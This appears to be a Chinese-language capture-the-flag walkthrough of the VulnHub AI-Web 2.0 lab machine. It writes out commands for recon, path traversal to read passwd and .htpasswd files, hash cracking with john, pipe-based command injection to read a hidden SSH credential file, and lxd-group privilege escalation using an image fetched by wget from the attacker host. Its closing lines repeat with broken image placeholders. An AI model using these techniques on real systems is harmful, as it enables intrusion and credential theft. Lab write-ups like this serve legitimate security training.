vulnhub靶场ai-web 2.0
配置环境 windows11 vmware 17.5 kali
靶机地址https://www.vulnhub.com/entry/ai-web-2,357/
攻击机kali192.168.31.131
首先使用
arp-scan -l
探测目标ip地址
发现目标ip地址为
192.168.31.134
使用nmap工具进行信息收集
nmap -T4 -sV -O -A -P //-T4(速度) -sV(版本扫描和开启的服务) -O(操作系统) -p(所有端口) ip
可以发现开放22和80端口,推测为ssh和http服务
先浏览器瞅一眼
先尝试admin等其他常见用户名登录无果
然后点击signup发现这是一个注册接口
注册好username就可以直接进行登录,这里注册一个admin
根据页面提示内容进行搜索
发现此为目录遍历漏洞
采用/download.php?file_name=…/etc/passwd的形式读取
一点一点的尝试
…/…/…/…/…/etc/passwd
根据之前信息收集的结果来看,服务器采用apache
所以尝试读取/etc/apache2/.htpasswd文件
得到对应的hash密码
尝试使用工具破解
这里采用john工具进行破解,kali自带
github上的rockyou-45作为字典进行爆破https://github.com/danielmiessler/SecLists/blob/master/Passwords/Leaked-Databases/rockyou-45.txt ,同时把hash密码存放在temp.txt中(自己建)
john --wordlist=rockyou-45.txt temp.txt
再使用
john --show temp.txt
命令查看密码
发现密码为c.ronaldo
尝试之前发现的ssh端口,发现不是ssh账号密码
之前采用过
dirb http://192.168.31.134/
目录爆破
发现了一个页面
尝试用刚刚收集到的账号密码
账号aiweb2admin 密码c.ronaldo
发现可以登录
根据提示内容,得知还有robots页面
发现新的目录
ok命令执行
经测试 可以使用|执行其他命令 这里输入为 | whomai
这里也尝试过bash反弹shell但是没有用,可能是做了限制
采用find命令
|| find . -type f /var/www/html/webadmin/S0mextras
找寻网站下所有文件
发现了sshUserCred55512.txt文件
cat看一下
|| cat /var/www/html/webadmin/S0mextras/.sshUserCred55512.txt
ssh连接(windows10dos也可以连接,这里我采用xshelll)
whoami,id查看权限
发现用户也属于lxd组
想到了lxd提权
使用
find / -perm -u=s -type f 2>/dev/null
从根目录查找具有root权限的二进制文件
刚好发现了lxc也存在root权限
所以采用lxd提权
在kali机上制作镜像,使用kali的root权限
lxd提权借鉴于[lxd/lxc组提权 - hirak0 - 博客园 (cnblogs.com)](https://www.cnblogs.com/hirak0/p/16111530.html#:~:text=如果你属于 lxd 或 lxc 组,你可以利用这个进行提权,在没有互联网的情况下利用 方法一 您可以在您的机器上安装此发行版构建器: https%3A%2F%2Fgithub.com%2Flxc%2Fdistrobuilder(按照 github 的说明进行操作))
我这边已经制作好镜像了
所以使用python -m http.server 自定义端口号
搭建vps
再使用靶机下载下来
wget -S http://192.168.31.131:8848/对应镜像
此时已经是root权限了
使用find命令查找flag
find / -name flag*
最后在来一首cat查看
总结:
1、目录扫描
2、目录遍历
3、命令执行
4、find命令
(img-iG6a9HfO-1700564874661)]
此时已经是root权限了
使用find命令查找flag
find / -name flag*
[外链图片转存中…(img-5S5e5d5A-1700564874662)]
最后在来一首cat查看
总结:
1、目录扫描
2、目录遍历
3、命令执行
4、find命令
5、lxd提权